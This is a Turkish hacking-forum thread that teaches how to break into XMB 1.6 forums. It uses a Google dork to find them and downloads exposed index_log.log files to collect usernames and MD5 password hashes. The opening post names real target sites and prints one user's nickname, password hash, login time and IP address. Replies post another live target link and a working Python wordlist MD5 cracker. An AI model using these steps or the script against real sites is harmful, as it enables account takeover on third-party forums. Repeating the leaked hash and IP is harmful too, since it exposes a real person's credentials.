%100 Web Hack
-
Simdi www.google.com da "powered by xmb 1.6" diye aratıyoruz. Karşımıza http://site/forum/index.php xmb forumlu linkler geldi diyelim. Şimdi bu forumda bulunan bir bug(açık)dan yararlanacağız. Onun için ilgilenecegimiz link şu olacak:
http://site/forum/index_log.log
Biz index e giren bütün herseyi bu index_log.log dan ögreneceğiz,bu linke tıkladıgımızda bilgisayarımıza o index loglarını kaydetecegiz ki girenleri görebilelim.
Mesela;
http://www.8afmuseum.net/forum2/index_log.log veya
http://www.liston.biz/pinenut_forum/index.php adlı siteye ben denedim.
http://www.liston.biz/pinenut_forum/index_log.log buraya tıkladım.Bilgisayarıma index loglarını indrdim. ve bu dosyayı .htm diye kaybettim.Daha sonra içini açıp bakıyoruz.Herşey burda ne geldi görelim:
xmbuser=gamerg; xmbpw=9156a3c65cd927934f6a1bdd536257b7 28/05/2004 02:12:56|212.106.84.37 ( gamerg nickli sahıs
156a3c65cd927934f6a1bdd536257b7 md5 algoritmalı sifre ile siteye 28/05/2004 02:12:56 tarihinde 212.106.84.37 ip numarasından foruma giriş yapmış..Peki burdaki md5 algoritma nedir.Bu php li sitelerde user passları icin yapılan algoritmadır.Bütn php li sitelerde bu algoritma gecerlidir.En önemli özelliği geri dönüşünün olmamasıdır.Yani şifreni unuttum dersen eski sifren asla geri gelmez ve site sahibi bile senin şifreni bilemez.Peki bu şifreler kırılır mı? Evet ama bunu nasıl kırılacağız? md5crack,brute force atack..gibi programlarla kırıyoruz. Uzun sürüyor Çünkü md5 li sifreler kriptoludur.Bunları decrypt (sifresi cözülmüş)yapmalıyız.Sonra siteye login oluyoruz.ama once admin nicki ve passını bulmalıyız.."admin" nicki yoksa siteye en cok girenlerden biri admindir.
Şimdiden iyi calısmalar. -
http://www.cyborski.com/
alsana bi site buldum dediğin md5 le kır bakalım kır şerefsizim helal lan diyecem.
http://www.cyborski.com/forums/index_log.log
al logunuda veerdim
bırak ağa bırak -
senin bu verdiğini herkes milw0rm,packetstorm veya benzeri siteleri takip ederek elde edebilecekleri bişii.ben buna hack demem nie mi?
sence nie? çünkü başkasının bulmuş olduğu açığı kullanıyorsun. Sence bu hack mi?
bence bilgisayar operatörlüğünden başka birşey deil, çünkü herkes google'da bişiiler aratabilir.
md5'in ne olduğunu kavra da gel. tüm md5'leri kırabileceğin bir rainbow yok, dünyada varsa da sen de yoktur.
deneyerek kaç basamağa kadar kırabilecen?
al sana python'la yazdığım md5 kirekır;
#!/usr/bin/env python
#cnr437 md5 kirekir
import md5, sys
if len(sys.argv) != 3:
print "Kullanimi: ./md5kiran.py <hash> <wordlist>"
sys.exit(1)
sifre = sys.argv[1]
kliste = sys.argv[2]
try:
kelime = open(kliste, "r")
except(IOError):
print "Hata; Kelime listesinin dizinini birdaha kontrol ediniz.\n"
sys.exit(1)
if len(sifre)!=32:
print "Girmis oldugunuz;",sifre,"\nmd5 degil veya karakter eksik,kontrol ediniz.\n"
sys.exit(1)
print "\nSifreler arabellege aktarildi.\nIslem surduruluyor,sifre adedine bagli olarak islem uzun surebilir."
kelime=kelime.readlines()
for klm in kelime:
hash = md5.new(klm[:-1])
dogru = hash.hexdigest()
if sifre == dogru:
print "=*"*24,"\nAhanda Sifre:",klm,"\n"
sys.exit(1)ama çok uzun sürer onu söyleyem.
%100 hack nedir biliyomusun??
bence "Backtrack 2" dir!
"http://remote-exploit.org" tur,
"http://forums.remote-exploit.org" tur,
Tahribatta geyik yapabilmektir.
-
cnr437 bunu yazdı:
-----------------------------hadi yapak amy :D
pygtk öğrenmeeye çalışıyom zaten
çok iyi gelir.
-----------------------------ne pygtk'sı geçiceksin onu gel senide QT'ci yapalım......Sırf Gnome kullanıyorsun diye gtk ile sürünme:D
-
qt de olur, ikisini de yazalım :)
-
cnr437 bunu yazdı:
-----------------------------
qt de olur, ikisini de yazalım :)
-----------------------------Tamam thearding olayını biliyormusun yoksa onuda gösterim aynı anda 10-20 şifre denesin üstüne birde wordlist secme özelligide ekleriz kafasına göre takılır netteki motorlarada baglanmak için curl olayı tamam ne kaldı
-
pyqt süpermiş la, acaip kolay görünüyo.
threadingle bi ara boğuşuyodum,sonra vazgeçtim,ama döner bakarım tekrar.
vediğim kodda zaten wordlist seçiyon
rainbow generator'ü de var bunun bende, onu da yazdıydım :D
-
Gereksiz atılacak her mesaj hayırlı sonuclar doğurmayacaktır...
-
bi deniyelim saols kardes
-
en son kafede 5 yaşındakı cocuk denerken gormustum
-
sen yenisin galiba :)